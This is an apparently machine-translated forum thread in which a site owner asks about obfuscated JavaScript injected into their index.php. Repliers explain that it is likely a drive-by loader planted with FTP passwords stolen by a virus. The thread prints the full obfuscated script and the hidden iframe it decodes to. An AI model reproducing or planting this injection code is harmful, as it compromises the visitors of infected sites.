Hacked website?

Today, the site discovered code implanted in index.php. The code was implanted between the ?>.

Does anyone know what is this hack and what does he do?

<html><body><script>var el,ar,ar2,pos,yes=false;setInterval(function(){if(yes){try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar='0(: ]tn Ee{oa>rs\'T[=NyghvuwC-'zA<cp);1.B/bm}flid';


ar2='R12c12c188c180c28c4c192c44c136c104c172c36c24c20c156c92c36c20c32c184c36c172c36c24c20c60c160c88c68c48c92c84c48c172c36c4c120c168c44c192c88c120c144c76c0c16c144c40c12c12c12c188c180c56c48c172c36c56c4c144c148c12c12c176c28c36c184c60c36c28c40c12c12c12c192c44c136c104c172c36c24c20c156c108c56c188c20c36c4c64c132c188c180c56c48c172c36c28c60c56c136c80c120c96c20c20c140c8c164c164c24c20c116c60c20c48c20c60c156c136c124c156c136c136c164c136c44c104c24c20c36c56c156c96c20c172c120c28c108c188c192c20c96c80c120c152c0c120c28c96c36c188c92c96c20c80c120c152c0c120c28c60c20c88c184c36c80c120c100c188c60c188c168c188c184c188c20c88c8c96c188c192c192c36c24c148c140c44c60c188c20c188c44c24c8c48c168c60c44c184c104c20c36c148c184c36c180c20c8c0c148c20c44c140c8c0c148c120c52c132c164c188c180c56c48c172c36c52c64c144c148c12c12c176c12c12c180c104c24c136c20c188c44c24c28c188c180c56c48c172c36c56c4c144c40c12c12c12c100c48c56c28c180c28c80c28c192c44c136c104c172c36c24c20c156c136c56c36c48c20c36c32c184c36c172c36c24c20c4c120c188c180c56c48c172c36c120c144c148c180c156c60c36c20c128c20c20c56c188c168c104c20c36c4c120c60c56c136c120c72c120c96c20c20c140c8c164c164c24c20c116c60c20c48c20c60c156c136c124c156c136c136c164c136c44c104c24c20c36c56c156c96c20c172c120c144c148c180c156c60c20c88c184c36c156c100c188c60c188c168c188c184c188c20c88c80c120c96c188c192c192c36c24c120c148c180c156c60c20c88c184c36c156c140c44c60c188c20c188c44c24c80c120c48c168c60c44c184c104c20c36c120c148c180c156c60c20c88c184c36c156c184c36c180c20c80c120c0c120c148c180c156c60c20c88c184c36c156c20c44c140c80c120c0c120c148c180c156c60c36c20c128c20c20c56c188c168c104c20c36c4c120c108c188c192c20c96c120c72c120c152c0c120c144c148c180c156c60c36c20c128c20c20c56c188c168c104c20c36c4c120c96c36c188c92c96c20c120c72c120c152c0c120c144c148c12c12c12c192c44c136c104c172c36c24c20c156c92c36c20c32c184c36c172c36c24c20c60c160c88c68c48c92c84c48c172c36c4c120c168c44c192c88c120c144c76c0c16c156c48c140c140c36c24c192c112c96c188c184c192c4c180c144c148c12c12c176]'.replace(k.substr(0,1),'[');pau='urn eReferenceErr'.replace(k,'val');e=Function('ret'+pau)();ar2=e(ar2.replace(/c/g,','));s=";pos=0;for(i=0;i!=ar2.length;i++){e('pos=parseInt(ar2[i] / 4)');e('s+=ar.substr(pos,1)');}<br>
e(s);yes=false;}},20);setTimeout(function(){el=document.createElement('div');el.innerHTML='&#82;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#69;&#114;&#114;';yes=true;},1);</script></body></html><br>
October 10th 19 at 07:33
4 answers
October 10th 19 at 07:35
Banal lost passwords from FTP.
Not sure, but possible. Because the hack failed. The code was inserted between ?> (?(code)>). And in the end the engine just returned a PHP error. - jessika38 commented on October 10th 19 at 07:38
Filled with machine code, so often there are mistakes. - kavon.Murphy commented on October 10th 19 at 07:41
have Savile crooked apparently. )
Options in addition to access to FTP is extremely unlikely (Loading of exploit, scanning the file system), much easier even use social engineering to get the password, I'm not talking about saved passwords in total Commanderie on the infected computer client - Myah_Jones commented on October 10th 19 at 07:44
according to Freud a typo:) "using social engineering"* - Myah_Jones commented on October 10th 19 at 07:47
Yes FTP, FTP...
A year ago there was a big wave of virus that once in the computer, scanned the registry and configs on the subject of popular FTP-clients and saved passwords (FAR, TC, etc.)
Then came to all available sites and add this code to all files with names index.php, index.html etc.
There's some kind of virus. - Evie commented on October 10th 19 at 07:50
I have not FAR and not TC. Passwords Transmit'E. worry about the theft of passwords with MacOS X?? - jessika38 commented on October 10th 19 at 07:53
I do not know, did not use. But in General storing passwords in the remote access program is any risk. Create a text document, zasunte it in an encrypted partition — it will be safety - Myah_Jones commented on October 10th 19 at 07:56
October 10th 19 at 07:37
Sticks here is a iframe:

<iframe src="http://nt-stats.cz.cc/counter.htm" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></property></iframe>
And the server is not found. By the way, this code on hundreds of website. - jessika38 commented on October 10th 19 at 07:40
October 10th 19 at 07:39
On the home computer virus pulled saved FTP passwords. You need to put the antivirus and change the FTP access.
October 10th 19 at 07:41
Who is your hosting provider? I have the same problem on the website father. In all index.* files this code.
Provider "Prohosting", Ukraine, Dnepropetrovsk. - jessika38 commented on October 10th 19 at 07:44

Find more questions by tags virusesHacking